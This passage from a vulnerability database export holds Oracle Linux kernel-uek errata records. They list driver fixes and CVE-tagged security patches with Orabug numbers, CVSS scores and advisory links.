separately for each VMCS (Paolo Bonzini) [Orabug: 27056291] \n- KVM: VMX: require virtual NMI support (Paolo Bonzini) [Orabug: 27056291] \n- KVM: nVMX: Fix the NMI IDT-vectoring handling (Wanpeng Li) [Orabug: 27056291] \n- netlink: allow to listen 'all' netns (Nicolas Dichtel) [Orabug: 27077793] \n- netlink: rename private flags and states (Nicolas Dichtel) [Orabug: 27077793] \n- netns: use a spin_lock to protect nsid management (Nicolas Dichtel) [Orabug: 27077793] \n- netns: notify new nsid outside __peernet2id() (Nicolas Dichtel) [Orabug: 27077793] \n- netns: rename peernet2id() to peernet2id_alloc() (Nicolas Dichtel) [Orabug: 27077793] \n- netns: always provide the id to rtnl_net_fill() (Nicolas Dichtel) [Orabug: 27077793] \n- netns: returns always an id in __peernet2id() (Nicolas Dichtel) [Orabug: 27077793] \n- uek-rpm: add update-el-x86; fix-up ol6/update-el (Chuck Anderson) [Orabug: 26844981] \n- xscore: add dma address check (Zhu Yanjun) [Orabug: 26994454] \n- qla2xxx: Update driver version to 9.00.00.00.40.0-k (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Fix delayed response to command for loop mode/direct connect. (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Use IOCB interface to submit non-critical MBX. (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Add async new target notification (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Allow relogin to proceed if remote login did not finish (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Fix sess_lock & hardware_lock lock order problem. (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Fix inadequate lock protection for ABTS. (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Fix request queue corruption. (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Fix memory leak for abts processing (Quinn Tran) [Orabug: 26844197] \n- scsi: qla2xxx: Fix ql_dump_buffer (Joe Perches) [Orabug: 26844197] \n- scsi: qla2xxx: Fix response queue count for Target mode. (Michael Hernandez) [Orabug: 26844197] \n- scsi: qla2xxx: Cleaned up queue configuration code. (Michael Hernandez) [Orabug: 26844197] \n- qla2xxx: Fix a warning reported by the 'smatch' static checker (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Simplify usage of SRB structure in driver (Bart Van Assche) [Orabug: 26844197] \n- qla2xxx: Simplify usage of SRB structure in driver (Joe Carnuccio) [Orabug: 26844197] \n- qla2xxx: Improve RSCN handling in driver (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Add framework for async fabric discovery (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Track I-T nexus as single fc_port struct (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: introduce a private sess_kref (Christoph Hellwig) [Orabug: 26844197] \n- qla2xxx: Use d_id instead of s_id for more clarity (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Fix wrong argument in sp done callback (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Remove SRR code (Himanshu Madhani) [Orabug: 26844197] \n- qla2xxx: Cleanup TMF code translation from qla_target (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Disable out-of-order processing by default in firmware (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Fix erroneous invalid handle message (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Reduce exess wait during chip reset (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Terminate exchange if corrupted (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Fix crash due to null pointer access (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Collect additional information to debug fw dump (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Reset reserved field in firmware options to 0 (Himanshu Madhani) [Orabug: 26844197] \n- qla2xxx: Include ATIO queue in firmware dump when in target mode (Himanshu Madhani) [Orabug: 26844197] \n- qla2xxx: Fix wrong IOCB type assumption (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Add DebugFS node for target sess list. (Quinn Tran) [Orabug: 26844197] \n- tcm_qla2xxx: Convert to target_alloc_session usage (Nicholas Bellinger) [Orabug: 26844197] \n- qla2xxx: Use ATIO type to send correct tmr response (Swapnil Nagle) [Orabug: 26844197] \n- qla2xxx: Fix TMR ABORT interaction issue between qla2xxx and TCM (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Move atioq to a different lock to reduce lock contention (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Remove dependency on hardware_lock to reduce lock contention. (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Replace QLA_TGT_STATE_ABORTED with a bit. (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Wait for all conflicts before acking PLOGI (Alexei Potashnik) [Orabug: 26844197] \n- qla2xxx: Delete session if initiator is gone from FW (Alexei Potashnik) [Orabug: 26844197] \n- qla2xxx: Added interface to send explicit LOGO. (Himanshu Madhani) [Orabug: 26844197] \n- qla2xxx: Add FW resource count in DebugFS. (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Enable Target counters in DebugFS. (Himanshu Madhani) [Orabug: 26844197] \n- qla2xxx: terminate exchange when command is aborted by LIO (Alexei Potashnik) [Orabug: 26844197] \n- qla2xxx: drop cmds/tmrs arrived while session is being deleted (Alexei Potashnik) [Orabug: 26844197] \n- qla2xxx: disable scsi_transport_fc registration in target mode (Alexei Potashnik) [Orabug: 26844197] \n- qla2xxx: added sess generations to detect RSCN update races (Alexei Potashnik) [Orabug: 26844197] \n- qla2xxx: Abort stale cmds on qla_tgt_wq when plogi arrives (Alexei Potashnik) [Orabug: 26844197] \n- qla2xxx: delay plogi/prli ack until existing sessions are deleted (Alexei Potashnik) [Orabug: 26844197] \n- qla2xxx: cleanup cmd in qla workqueue before processing TMR (Swapnil Nagle) [Orabug: 26844197] \n- qla2xxx: Add flush after updating ATIOQ consumer index. (Quinn Tran) [Orabug: 26844197] \n- qla2xxx: Enable target mode for ISP27XX (Himanshu Madhani) [Orabug: 26844197]\n[4.1.12-112.7.1]\n- x86/platform/uv: Fix kdump for UV (Kirtikar Kashyap) [Orabug: 27031280] \n- firmware: dmi_scan: add SBMIOS entry and DMI tables (Ivan Khoronzhuk) [Orabug: 27045425] \n- KEYS: prevent KEYCTL_READ on negative key (Eric Biggers) [Orabug: 27050237] {CVE-2017-12192}\n- NFS: Add static NFS I/O tracepoints (Chuck Lever) \n- Hang/soft lockup in d_invalidate with simultaneous calls (Al Viro) [Orabug: 27052680] \n- scsi: mpt3sas: Bump mpt3sas driver version to v16.100.00.00 (Sreekanth Reddy) [Orabug: 26894579] \n- scsi: mpt3sas: Adding support for SAS3616 HBA device (Sreekanth Reddy) [Orabug: 26894579] \n- scsi: mpt3sas: Fix possibility of using invalid Enclosure Handle for SAS device after host reset (Sreekanth Reddy) [Orabug: 26894579] \n- scsi: mpt3sas: Display chassis slot information of the drive (Sreekanth Reddy) [Orabug: 26894579] \n- scsi: mpt3sas: Updated MPI headers to v2.00.48 (Sreekanth Reddy) [Orabug: 26894579] \n- scsi: mpt3sas: Fix IO error occurs on pulling out a drive from RAID1 volume created on two SATA drive (Sreekanth Reddy) [Orabug: 26894579] \n- scsi: mpt3sas: Fix removal and addition of vSES device during host reset (Sreekanth Reddy) [Orabug: 26894579] \n- scsi: mpt3sas: Reduce memory footprint in kdump kernel (Sreekanth Reddy) [Orabug: 26894579] \n- scsi: mpt3sas: Fixed memory leaks in driver (Sreekanth Reddy) [Orabug: 26894579] \n- scsi: mpt3sas: Processing of Cable Exception events (Sreekanth Reddy) [Orabug: 26894579] \n- storvsc: dont assume SG list is contiguous (Aruna Ramakrishna) [Orabug: 27044703] \n- sysctl: Drop reference added by grab_header in proc_sys_readdir (Zhou Chengming) [Orabug: 27036905] {CVE-2016-9191} {CVE-2016-9191} {CVE-2016-9191}\n- uek-rpm: Update kernel-ueknanos provides list. (Somasundaram Krishnasamy) [Orabug: 27022769] \n- uek-rpm: Add more modules to ueknano for OL7 (Somasundaram Krishnasamy) [Orabug: 27015961] \n- selinux: fix off-by-one in setprocattr (Stephen Smalley) [Orabug: 27001687] {CVE-2017-2618} {CVE-2017-2618} {CVE-2017-2618}\n- dtrace: Add CTF archive to the UEK nano package (Tomas Jedlicka) [Orabug: 27039123] \n- Revert 'drivers/char/mem.c: deny access in open operation when securelevel is set' (Dhaval Giani) [Orabug: 27037801] \n- thp: run vma_adjust_trans_huge() outside i_mmap_rwsem (Kirill A. Shutemov) [Orabug: 26763484]\n[4.1.12-112.6.1]\n- ocfs2: fix posix_acl_create deadlock (Junxiao Bi) [Orabug: 26808507] \n- rds: Proper init/exit declaration for module init/exit function (Ka-Cheong Poon) [Orabug: 26937730] \n- rds: Remove .exit from struct rds_transport (Ka-Cheong Poon) [Orabug: 26937730] \n- smartpqi: update driver version (Don Brace) [Orabug: 26882397] \n- smartpqi: cleanup raid map warning message (Kevin Barnett) [Orabug: 26882397] \n- smartpqi: update controller ids (Kevin Barnett) [Orabug: 26882397] \n- scsi: smartpqi: remove the smp_handler stub (Christoph Hellwig) [Orabug: 26882397] \n- scsi: smartpqi: change driver version to 1.1.2-125 (Kevin Barnett) [Orabug: 26882397] \n- scsi: smartpqi: add in new controller ids (Kevin Barnett) [Orabug: 26882397] \n- scsi: smartpqi: update kexec and power down support (Kevin Barnett) [Orabug: 26882397] \n- scsi: smartpqi: cleanup doorbell register usage. (Kevin Barnett) [Orabug: 26882397] \n- scsi: smartpqi: update pqi passthru ioctl (Kevin Barnett) [Orabug: 26882397] \n- scsi: smartpqi: enhance BMIC cache flush (Kevin Barnett) [Orabug: 26882397] \n- scsi: smartpqi: add pqi reset quiesce support (Kevin Barnett) [Orabug: 26882397] \n- scsi: smartpqi: make pdev pointer names consistent (Kevin Barnett) [Orabug: 26882397] \n- udp: consistently apply ufo or fragmentation (Willem de Bruijn) [Orabug: 26921314] {CVE-2017-1000112}\n- be2net: fix TSO6/GSO issue causing TX-stall on Lancer/BEx (Suresh Reddy) [Orabug: 26928620] \n- ipv6: avoid overflow of offset in ip6_find_1stfragopt (Sabrina Dubroca) [Orabug: 27011248] {CVE-2017-7542}\n- xfs: use dedicated log worker wq to avoid deadlock with cil wq (Brian Foster) [Orabug: 27013239] \n- nvme: honor RTD3 Entry Latency for shutdowns (Martin K. Petersen) [Orabug: 26929569]\n[4.1.12-112.5.1]\n- uek-rpm: Build kernel ueknano rpm for OL7 (Somasundaram Krishnasamy) [Orabug: 26803594] \n- uek/config: enable NVME SG_IO support by default (Shan Hai) [Orabug: 26981802] \n- nvme: report the scsi TUR state correctly (Shan Hai) [Orabug: 26981802] \n- scsi: scsi_transport_iscsi: fix the issue that iscsi_if_rx doesnt parse nlmsg properly (Xin Long) [Orabug: 26988631] {CVE-2017-14489}\n- CVE-2016-10318 missing authorization check fscrypt_process_policy (Jack Vogel) [Orabug: 26989776] \n- ovl: fix get_acl() on tmpfs (Miklos Szeredi) [Orabug: 26975443]\n[4.1.12-112.2.1]\n- ixgbe: Initialize 64-bit stats seqcounts (Florian Fainelli) [Orabug: 26785078] \n- ixgbe: Disable flow control for XFI (Tony Nguyen) [Orabug: 26785078] \n- ixgbe: Do not support flow control autonegotiation for X553 (Tony Nguyen) [Orabug: 26785078] \n- ixgbe: Update NW_MNG_IF_SEL support for X553 (Tony Nguyen) [Orabug: 26785078] \n- ixgbe: Enable LASI interrupts for X552 devices (Tony Nguyen) [Orabug: 26785078] \n- ixgbe: Ensure MAC filter was added before setting MACVLAN (Tony Nguyen) [Orabug: 26785078] \n- ixgbe: pci_set_drvdata must be called before register_netdev (Jeff Mahoney) [Orabug: 26785078] \n- ixgbe: Resolve cppcheck format string warning (Tony Nguyen) [Orabug: 26785078] \n- ixgbe: fix writes to PFQDE (Emil Tantilov) [Orabug: 26785078] \n- ixgbevf: Bump version number (Tony Nguyen) [Orabug: 26785078] \n- ixgbe: Bump version number (Tony Nguyen) [Orabug: 26785078] \n- ixgbe: check for Tx timestamp timeouts during watchdog (Jacob Keller) [Orabug: 26785078] \n- ixgbe: add statistic indicating number of skipped Tx timestamps (Jacob Keller) [Orabug: 26785078] \n- ixgbe: avoid permanent lock of *_PTP_TX_IN_PROGRESS (Jacob Keller) [Orabug: 26785078] \n- ixgbe: fix race condition with PTP_TX_IN_PROGRESS bits (Jacob Keller) [Orabug: 26785078] \n- net: better skb->sender_cpu and skb->napi_id cohabitation (Eric Dumazet) [Orabug: 26953388] [Orabug: 26591689] \n- uek-rpm: Clean up installed directories when uninstalling kernel-ueknano (Somasundaram Krishnasamy) [Orabug: 26929773] \n- uek-rpm: Add missing ko modules to nano rpm (Somasundaram Krishnasamy) [Orabug: 26929773] \n- i40e: point wb_desc at the nvm_wb_desc during i40e_read_nvm_aq (Jacob Keller) [Orabug: 26785018] \n- i40e: avoid NVM acquire deadlock during NVM update (Anjali Singhai Jain) [Orabug: 26785018] \n- i40e/i40evf: avoid dynamic ITR updates when polling or low packet rate (Jacob Keller) [Orabug: 26785018] \n- i40e/i40evf: remove ULTRA latency mode (Jacob Keller) [Orabug: 26785018] \n- i40e: invert logic for checking incorrect cpu vs irq affinity (Jacob Keller) [Orabug: 26785018] \n- i40e: initialize our affinity_mask based on cpu_possible_mask (Jacob Keller) [Orabug: 26785018] \n- i40e: move enabling icr0 into i40e_update_enable_itr (Jacob Keller) [Orabug: 26785018] \n- i40e: remove workaround for resetting XPS (Jacob Keller) [Orabug: 26785018] \n- i40e: Fix for unused value issue found by static analysis (Carolyn Wyborny) [Orabug: 26785018] \n- i40e: 25G FEC status improvements (Mariusz Stachura) [Orabug: 26785018] \n- i40e: force VMDQ device name truncation (Jacob Keller) [Orabug: 26785018] \n- i40evf: fix possible snprintf truncation of q_vector->name (Jacob Keller) [Orabug: 26785018] \n- i40e: Use correct flag to enable egress traffic for unicast promisc (Akeem G Abodunrin) [Orabug: 26785018] \n- i40e: prevent snprintf format specifier truncation (Jacob Keller) [Orabug: 26785018] \n- i40e: Store the requested FEC information (Mariusz Stachura) [Orabug: 26785018] \n- i40e: Update state variable for adminq subtask (Sudheer Mogilappagari) [Orabug: 26785018] \n- i40e: synchronize nvmupdate command and adminq subtask (Sudheer Mogilappagari) [Orabug: 26785018] \n- i40e: prevent changing ITR if adaptive-rx/tx enabled (Alan Brady) [Orabug: 26785018] \n- i40evf: use netdev variable in reset task (Alan Brady) [Orabug: 26785018] \n- i40e: move check for avoiding VID=0 filters into i40e_vsi_add_vlan (Jacob Keller) [Orabug: 26785018] \n- i40e/i40evf: use cmpxchg64 when updating private flags in ethtool (Jacob Keller) [Orabug: 26785018] \n- i40e: Detect ATR HW Evict NVM issue and disable the feature (Anjali Singhai Jain) [Orabug: 26785018] \n- i40e: Fix a bug with VMDq RSS queue allocation (Anjali Singhai Jain) [Orabug: 26785018] \n- i40evf: prevent VF close returning before state transitions to DOWN (Sudheer Mogilappagari) [Orabug: 26785018] \n- i40e: Initialize 64-bit statistics TX ring seqcount (Florian Fainelli) [Orabug: 26785018] \n- i40e: handle setting administratively set MAC address back to zero (Stefan Assmann) [Orabug: 26785018] \n- i40evf: remove unnecessary __packed (Tushar Dave) [Orabug: 26785018] \n- i40evf: add some missing includes (Jesse Brandeburg) [Orabug: 26785018] \n- i40e: display correct UDP tunnel type name (Jacob Keller) [Orabug: 26785018] \n- i40e/i40evf: remove mismatched type warnings (Jesse Brandeburg) [Orabug: 26785018] \n- i40e/i40evf: make IPv6 ATR code clearer (Jesse Brandeburg) [Orabug: 26785018] \n- i40e: fix odd formatting and indent (Jesse Brandeburg) [Orabug: 26785018] \n- i40e: fix up 32 bit timespec references (Jesse Brandeburg) [Orabug: 26785018] \n- i40e: Handle admin Q timeout when releasing NVM (Paul M Stillwell Jr) [Orabug: 26785018] \n- i40e: remove WQ_UNBOUND and the task limit of our workqueue (Jacob Keller) [Orabug: 26785018] \n- i40e: Fix for trace found with S4 state (Carolyn Wyborny) [Orabug: 26785018] \n- i40e: fix incorrect variable assignment (Gustavo A R Silva) [Orabug: 26785018] \n- i40e: dont hold RTNL lock for the entire reset (Jacob Keller) [Orabug: 26785018] \n- i40e: clear only cause_ena bit (Shannon Nelson) [Orabug: 26785018] \n- i40e: fix disabling overflow promiscuous mode (Alan Brady) [Orabug: 26785018] \n- i40e: Add support for OEM firmware version (Filip Sadowski) [Orabug: 26785018] \n- i40e: genericize the partition bandwidth control (Shannon Nelson) [Orabug: 26785018] \n- i40e: Add message for unsupported MFP mode (Carolyn Wyborny) [Orabug: 26785018] \n- i40e: Support firmware CEE DCB UP to TC map re-definition (Greg Bowers) [Orabug: 26785018] \n- i40e: Fix potential out of bound array access (Sudheer Mogilappagari) [Orabug: 26785018] \n- i40e: comment that udp_port must be in host byte order (Jacob Keller) [Orabug: 26785018] \n- i40e: use dev_dbg instead of dev_info when warning about missing routine (Jacob Keller) [Orabug: 26785018] \n- i40e/i40evf: update WOL and I40E_AQC_ADDR_VALID_MASK flags (Alice Michael) [Orabug: 26785018] \n- i40evf: assign num_active_queues inside i40evf_alloc_queues (Jacob Keller) [Orabug: 26785018] \n- i40e: Fix a sleep-in-atomic bug (Jia-Ju Bai) [Orabug: 26785018] \n- i40e: fix handling of HW ATR eviction (Jacob Keller) [Orabug: 26785018] \n- i40evf: update i40evf.txt with new content (Jesse Brandeburg) [Orabug: 26785018] \n- i40evf: Add support for Adaptive Virtual Function (Preethi Banala) [Orabug: 26785018] \n- i40evf: drop i40e_type.h include (Jesse Brandeburg) [Orabug: 26785018] \n- i40e: Check for memory allocation failure (Christophe Jaillet) [Orabug: 26785018] \n- i40e: check for Tx timestamp timeouts during watchdog (Jacob Keller) [Orabug: 26785018] \n- i40e: use pf data structure directly in i40e_ptp_rx_hang (Jacob Keller) [Orabug: 26785018] \n- i40e: add statistic indicating number of skipped Tx timestamps (Jacob Keller) [Orabug: 26785018] \n- i40e: avoid permanent lock of *_PTP_TX_IN_PROGRESS (Jacob Keller) [Orabug: 26785018] \n- i40e: fix race condition with PTP_TX_IN_PROGRESS bits (Jacob Keller) [Orabug: 26785018] \n- i40evf: disable unused flags (Jesse Brandeburg) [Orabug: 26785018] \n- i40evf: fix merge error in older patch (Jesse Brandeburg) [Orabug: 26785018] \n- i40evf: fix duplicate lines (Jesse Brandeburg) [Orabug: 26785018] \n- i40evf: hide unused variable (Arnd Bergmann) [Orabug: 26785018] \n- i40evf: allocate queues before we setup the interrupts and q_vectors (Jacob Keller) [Orabug: 26785018] \n- i40evf: remove I40E_FLAG_FDIR_ATR_ENABLED (Jacob Keller) [Orabug: 26785018] \n- i40e: remove hw_disabled_flags in favor of using separate flag bits (Jacob Keller) [Orabug: 26785018] \n- i40evf: remove needless min_t() on num_online_cpus()*2 (Jacob Keller) [Orabug: 26785018] \n- i40e: remove unnecessary msleep() delay in i40e_free_vfs (Jacob Keller) [Orabug: 26785018] \n- i40e: amortize wait time when disabling lots of VFs (Jacob Keller) [Orabug: 26785018] \n- i40e: Reprogram port offloads after reset (Alexander Duyck) [Orabug: 26785018] \n- i40e: rename index to port to avoid confusion (Jacob Keller) [Orabug: 26785018] \n- i40e: make use of i40e_reset_all_vfs when initializing new VFs (Jacob Keller) [Orabug: 26785018] \n- i40e: properly spell I40E_VF_STATE_* flags (Jacob Keller) [Orabug: 26785018] \n- i40e: use i40e_stop_rings_no_wait to implement PORT_SUSPENDED state (Jacob Keller) [Orabug: 26785018] \n- i40e: reset all VFs in parallel when rebuilding PF (Jacob Keller) [Orabug: 26785018] \n- i40e: split some code in i40e_reset_vf into helpers (Jacob Keller) [Orabug: 26785018] \n- i40e: remove I40E_FLAG_IN_NETPOLL entirely (Jacob Keller) [Orabug: 26785018] \n- i40e: reduce wait time for adminq command completion (Jacob Keller) [Orabug: 26785018] \n- i40e: fix CONFIG_BUSY checks in i40e_set_settings function (Jacob Keller) [Orabug: 26785018] \n- i40e: factor out queue control from i40e_vsi_control_(tx|rx) (Jacob Keller) [Orabug: 26785018] \n- i40e: dont hold RTNL lock while waiting for VF reset to finish (Jacob Keller) [Orabug: 26785018] \n- i40e: new AQ commands (Jingjing Wu) [Orabug: 26785018] \n- i40e/i40evf: Add tracepoints (Scott Peterson) [Orabug: 26785018] \n- i40evf: add client interface (Mitch Williams) [Orabug: 26785018] \n- i40e: dump VF information in debugfs (Mitch Williams) [Orabug: 26785018] \n- i40e: Fix support for flow director programming status (Alexander Duyck) [Orabug: 26785018] \n- i40e/i40evf: Remove VF Rx csum offload for tunneled packets (alice michael) [Orabug: 26785018] \n- i40evf: Use net_device_stats from struct net_device (Tobias Klauser) [Orabug: 26785018] \n- i40e: clean up historic deprecated flag definitions (Jacob Keller) [Orabug: 26785018] \n- i40e: remove I40E_FLAG_NEED_LINK_UPDATE (Alice Michael) [Orabug: 26785018] \n- i40e: remove extraneous loop in i40e_vsi_wait_queues_disabled (Jacob Keller) [Orabug: 26785018] \n- i40e: Simplify i40e_detect_recover_hung_queue logic (Alan Brady) [Orabug: 26785018] \n- i40e: Decrease the scope of rtnl lock (Maciej Sosin) [Orabug: 26785018] \n- i40e: Swap use of pf->flags and pf->hw_disabled_flags for ATR Eviction (Alexander Duyck) [Orabug: 26785018] \n- i40e: update error message when trying to add invalid filters (Jacob Keller) [Orabug: 26785018] \n- i40e: only register client on iWarp-capable devices (Mitch Williams) [Orabug: 26785018] \n- i40e: close client on remove and shutdown (Mitch Williams) [Orabug: 26785018] \n- i40e: register existing client on probe (Mitch Williams) [Orabug: 26785018] \n- i40e: remove client instance on driver unload (Mitch Williams) [Orabug: 26785018] \n- i40e: fix for queue timing delays (Wyborny, Carolyn) [Orabug: 26785018] \n- i40e/i40evf: Change the way we limit the maximum frame size for Rx (Alexander Duyck) [Orabug: 26785018] \n- i40e/i40evf: Add legacy-rx private flag to allow fallback to old Rx flow (Alexander Duyck) [Orabug: 26785018] \n- i40e/i40evf: Pull code for grabbing and syncing rx_buffer from fetch_buffer (Alexander Duyck) [Orabug: 26785018] \n- i40e/i40evf: Use length to determine if descriptor is done (Alexander Duyck) [Orabug: 26785018] \n- drivers/char/mem.c: deny access in open operation when securelevel is set (Ethan Zhao) [Orabug: 26943864]\n[4.1.12-112.1.0]\n- x86/mm/64: Enable SWIOTLB if system has SRAT memory regions above MAX_DMA32_PFN (Igor Mammedov) [Orabug: 26754302] \n- x86/mm: Introduce max_possible_pfn (Igor Mammedov) [Orabug: 26754302] \n- dtrace lockstat provider probes (Alan Maguire) [Orabug: 26149674] [Orabug: 26149956] \n- rds: RDS diagnostics when connections are stuck in Receiver Not Ready state. (hui.han) \n- timerfd: Protect the might cancel mechanism proper (Thomas Gleixner) [Orabug: 26673877] {CVE-2017-10661}\n- brcmfmac: fix possible buffer overflow in brcmf_cfg80211_mgmt_tx() (Tim Tianyang Chen) [Orabug: 26540118] {CVE-2017-7541}\n- crypto: ahash - Fix EINPROGRESS notification callback (Herbert Xu) [Orabug: 25882988] {CVE-2017-7618}\n- xen/mmu: Call xen_cleanhighmap() with 4MB aligned for page tables mapping (Zhenzhong Duan) [Orabug: 26883325] \n- selftests/memfd: add memfd_create hugetlbfs selftest (Mike Kravetz) [Orabug: 26768367] \n- mm/shmem: add hugetlbfs support to memfd_create() (Mike Kravetz) [Orabug: 26768367] \n- mm: shm: use new hugetlb size encoding definitions (Mike Kravetz) [Orabug: 26768367] \n- mm: arch: consolidate mmap hugetlb size encodings (Mike Kravetz) [Orabug: 26768367] \n- uapi/Kbuild: add new header file hugetlb_encode.h (Mike Kravetz) [Orabug: 26768367] \n- mm: hugetlb: define system call hugetlb size encodings in single file (Mike Kravetz) [Orabug: 26768367] \n- RDS: IB: Change the proxy qps path_mtu to IB_MTU_256 (Avinash Repaka) [Orabug: 26864694] \n- devpts: clean up interface to pty drivers (Linus Torvalds) [Orabug: 26743034] \n- tcp: fix tcp_mark_head_lost to check skb len before fragmenting (Neal Cardwell) [Orabug: 26646104] \n- kvm: nVMX: Dont allow L2 to access the hardware CR8 (Jim Mattson) {CVE-2017-12154} {CVE-2017-12154}\n- dtrace: ensure SDT stub function returns 0 (Kris Van Hees) [Orabug: 26909775] \n- tcp: initialize rcv_mss to TCP_MIN_MSS instead of 0 (Wei Wang) [Orabug: 26796038] {CVE-2017-14106}\n- xfrm: fix stack access out of bounds with CONFIG_XFRM_SUB_POLICY (Sabrina Dubroca) [Orabug: 25959303] \n- rxrpc: Fix several cases where a padded len isnt checked in ticket decode (David Howells) [Orabug: 26376434] {CVE-2017-7482} {CVE-2017-7482}\n- xen: dont print error message in case of missing Xenstore entry (Juergen Gross) [Orabug: 26841566] \n- mlx4_core: calculate log_num_mtt based on total system memory (Wei Lin Guay) [Orabug: 26526968] \n- xen/x86: Add interface for querying amount of host memory (Boris Ostrovsky) [Orabug: 26526923] \n- rds: Fix non-atomic operation on shared flag variable (Hakon Bugge) [Orabug: 26842076] \n- rds: Fix incorrect statistics counting (Hakon Bugge) [Orabug: 26847583] \n- i40e: use cpumask_copy instead of direct assignment (Jacob Keller) [Orabug: 26822609] \n- mm: thp: set THP defrag by default to madvise and add a stall-free defrag option (Mel Gorman) [Orabug: 26587019] \n- crypto: testmgr - Set struct aead_testvec iv member size to MAX_IVLEN (Somasundaram Krishnasamy) [Orabug: 25925256] \n- SPEC: remove ctf.ko from ueknano modules list (Nick Alcock) [Orabug: 25815362] \n- SPEC: generate CTF when DTrace is enabled. (Nick Alcock) [Orabug: 25815362] \n- SPEC: bump libdtrace-ctf requirement to 0.7+. (Nick Alcock) [Orabug: 25815362] \n- Documentation: add watermark_scale_factor to the list of vm systcl file (Jerome Marchand) [Orabug: 26643957] \n- mm: scale kswapd watermarks in proportion to memory (Johannes Weiner) [Orabug: 26643957] \n- ctf: delete the deduplication blacklist (Nick Alcock) [Orabug: 26765112] \n- ctf: automate away the deduplication blacklist (Nick Alcock) [Orabug: 26765112] \n- ctf: drop CONFIG_DT_DISABLE_CTF, ctf.ko, and all that it implies (Nick Alcock) [Orabug: 25815362] \n- ctf: do not allow dwarf2ctf to run as root (Nick Alcock) [Orabug: 25815362] \n- ctf: decouple CTF building from the kernel build (Nick Alcock) [Orabug: 25815362] \n- ctf: handle the bit_offset in members with a DW_FORM_block data_member_location (Nick Alcock) [Orabug: 26387109] \n- ctf: handle DW_AT_specification (Nick Alcock) [Orabug: 26386100]", "edition": 72, "modified": "2017-12-13T00:00:00", "published": "2017-12-13T00:00:00", "id": "ELSA-2017-3659", "href": "http://linux.oracle.com/errata/ELSA-2017-3659.html", "title": "Unbreakable Enterprise kernel security and bugfix update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:51", "bulletinFamily": "unix", "cvelist": ["CVE-2017-1000380", "CVE-2017-14489", "CVE-2017-8831", "CVE-2017-2671", "CVE-2017-11473", "CVE-2017-9075", "CVE-2017-10661", "CVE-2017-1000363", "CVE-2017-9077", "CVE-2016-10044"], "description": "kernel-uek\n[3.8.13-118.19.12]\n- nvme: Drop nvmeq->q_lock before dma_pool_alloc(), so as to prevent hard lockups (Aruna Ramakrishna) [Orabug: 25409587]\n[3.8.13-118.19.11]\n- nvme: Handle PM1725 HIL reset (Martin K. Petersen) [Orabug: 26277600] \n- char: lp: fix possible integer overflow in lp_setup() (Willy Tarreau) [Orabug: 26403940] {CVE-2017-1000363}\n- ALSA: timer: Fix missing queue indices reset at SNDRV_TIMER_IOCTL_SELECT (Takashi Iwai) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix race between read and ioctl (Takashi Iwai) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: fix NULL pointer dereference in read()/ioctl() race (Vegard Nossum) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix negative queue usage by racy accesses (Takashi Iwai) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix race at concurrent reads (Takashi Iwai) [Orabug: 26403956] {CVE-2017-1000380}\n- ALSA: timer: Fix race among timer ioctls (Takashi Iwai) [Orabug: 26403956] {CVE-2017-1000380}\n- ipv6/dccp: do not inherit ipv6_mc_list from parent (WANG Cong) [Orabug: 26404005] {CVE-2017-9077}\n- ocfs2: fix deadlock issue when taking inode lock at vfs entry points (Eric Ren) [Orabug: 26427126] \n- ocfs2/dlmglue: prepare tracking logic to avoid recursive cluster lock (Eric Ren) [Orabug: 26427126] \n- ping: implement proper locking (Eric Dumazet) [Orabug: 26540286] {CVE-2017-2671}\n- aio: mark AIO pseudo-fs noexec (Jann Horn) [Orabug: 26643598] {CVE-2016-10044}\n- vfs: Commit to never having exectuables on proc and sysfs. (Eric W. Biederman) [Orabug: 26643598] {CVE-2016-10044}\n- vfs, writeback: replace FS_CGROUP_WRITEBACK with SB_I_CGROUPWB (Tejun Heo) [Orabug: 26643598] {CVE-2016-10044}\n- x86/acpi: Prevent out of bound access caused by broken ACPI tables (Seunghun Han) [Orabug: 26643645] {CVE-2017-11473}\n- sctp: do not inherit ipv6_{mc|ac|fl}_list from parent (Eric Dumazet) [Orabug: 26650883] {CVE-2017-9075}\n- [media] saa7164: fix double fetch PCIe access condition (Steven Toth) [Orabug: 26675142] {CVE-2017-8831}\n- [media] saa7164: fix sparse warnings (Hans Verkuil) [Orabug: 26675142] {CVE-2017-8831}\n- fs: __generic_file_splice_read retry lookup on AOP_TRUNCATED_PAGE (Abhi Das) [Orabug: 26797306] \n- timerfd: Protect the might cancel mechanism proper (Thomas Gleixner) [Orabug: 26899787] {CVE-2017-10661}\n- scsi: scsi_transport_iscsi: fix the issue that iscsi_if_rx doesn't parse nlmsg properly (Xin Long) [Orabug: 26988627] {CVE-2017-14489}", "edition": 4, "modified": "2017-11-02T00:00:00", "published": "2017-11-02T00:00:00", "id": "ELSA-2017-3636", "href": 